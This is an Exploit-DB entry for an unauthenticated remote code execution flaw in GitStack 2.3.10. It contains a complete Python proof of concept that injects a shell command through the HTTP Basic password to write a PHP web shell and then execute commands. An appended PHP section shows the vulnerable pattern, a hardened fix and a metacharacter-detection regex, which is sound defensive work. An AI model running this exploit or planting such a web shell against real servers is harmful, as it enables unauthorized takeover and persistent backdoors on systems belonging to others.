GitStack 2.3.10 – Unauthenticated Remote Code Execution
EDB-ID: 43777
Author: Kacper Szurek
Published: 2018-01-18
CVE: N/A
Type: Webapps
Platform: PHP
Aliases: N/A
Tags: N/A
Vulnerable App: N/A

# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
#
# 1. Description
#
# $_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
# https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
#
# 2. Proof of Concept
#
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
 
ip = '192.168.1.102'
 
# What command you want to execute
command = "whoami"
 
repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'
 
user_list = []
 
print "[+] Get user list"
try:
    r = requests.get("http://{}/rest/user/".format(ip))
    user_list = r.json()
    user_list.remove('everyone')
except:
    pass
 
if len(user_list) > 0:
    username = user_list[0]
    print "[+] Found user {}".format(username)
else:
    r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
    print "[+] Create user"
     
    if not "User created" in r.text and not "User already exist" in r.text:
        print "[-] Cannot create user"
        os._exit(0)
 
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
    print "[+] Web repository already enabled"
else:
    print "[+] Enable web repository"
    r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
    if not "Web interface successfully enabled" in r.text:
        print "[-] Cannot enable web interface"
        os._exit(0)
 
print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
 
if len(repository_list) > 0:
    repository = repository_list[0]['name']
    print "[+] Found repository {}".format(repository)
else:
    print "[+] Create repository"
 
    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
    if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
        print "[-] Cannot create repository"
        os._exit(0)

print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
 
if not "added to" in r.text and not "has already" in r.text:
    print "[-] Cannot add user to repository"
    os._exit(0) 
 
print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
 
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
    print "[-] Cannot remove access for anyone"
    os._exit(0) 
 
print "[+] Create backdoor in PHP"
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')
 
print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')
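The root cause stated in the description above is that the HTTP Basic password reaches exec() through a shell. The PHP below is an added illustration written for this page, not GitStack's own source: it reproduces that pattern in minimal form and places a hardened replacement, a hash-based alternative and a small detection aid beside it. VERIFY_BIN and the verify_user.exe name are hypothetical placeholders for whatever helper the application shells out to; the allow-list regex and the metacharacter regex are this example's own choices.

```php
<?php
// Added illustration, not GitStack's own source: the pattern named in the
// description ($_SERVER['PHP_AUTH_PW'] reaching exec()) beside a hardened
// replacement. VERIFY_BIN is a hypothetical placeholder for whatever helper
// the application shells out to.
const VERIFY_BIN = 'C:\\path\\to\\verify_user.exe'; // placeholder, not a real GitStack path

// VULNERABLE: the Basic-auth password is pasted into a command string that a
// shell parses. cmd.exe treats "&&" as a command separator, so a password of
// the form  p && <anything>  runs <anything> under the web server's account,
// which is exactly what the PoC above relies on.
function authenticate_vulnerable(string $user, string $pass): bool
{
    exec(VERIFY_BIN . " {$user} {$pass}", $output, $rc);
    return $rc === 0;
}

// HARDENED: no shell is involved. Passing an array to proc_open() (PHP 7.4+)
// hands each element to the child as a separate argument, so metacharacters
// in the password are just bytes of the password. escapeshellarg() would be
// the fallback on older PHP, but on Windows it only neutralises quotes and
// percent signs, so removing the shell is the reliable fix.
function authenticate_hardened(string $user, string $pass): bool
{
    // Allow-list the username; it also ends up in log lines and file paths.
    if (preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $user) !== 1) {
        return false;
    }
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open([VERIFY_BIN, $user, $pass], $spec, $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fclose($pipes[0]);
    stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    stream_get_contents($pipes[2]);
    fclose($pipes[2]);
    return proc_close($proc) === 0;
}

// Better still: keep the check inside PHP and compare against a stored hash,
// so no external process ever sees the password.
function authenticate_with_hash(string $pass, string $storedHash): bool
{
    return password_verify($pass, $storedHash);
}

// Detection aid: a password carrying shell metacharacters deserves a log
// line, because the Basic header itself is normally not logged anywhere.
function looks_like_shell_injection(string $pass): bool
{
    return preg_match('/[&|;`<>]|\$\(|[\r\n]/', $pass) === 1;
}

// Request handling as it would sit in the entry script: PHP exposes the HTTP
// Basic credentials as PHP_AUTH_USER / PHP_AUTH_PW.
$user = $_SERVER['PHP_AUTH_USER'] ?? '';
$pass = $_SERVER['PHP_AUTH_PW'] ?? '';

if (looks_like_shell_injection($pass)) {
    error_log('Basic-auth password with shell metacharacters from '
        . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
}

if (!authenticate_hardened($user, $pass)) {
    header('WWW-Authenticate: Basic realm="GitStack"');
    http_response_code(401);
    exit;
}
```

The fix that matters is structural, not cosmetic: once no shell sits between the request and the helper, the "p && ..." password from the PoC is an ordinary failed login rather than a command. The log line from looks_like_shell_injection() gives a defender a signal for exactly that attempt, which would otherwise be invisible in standard access logs.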
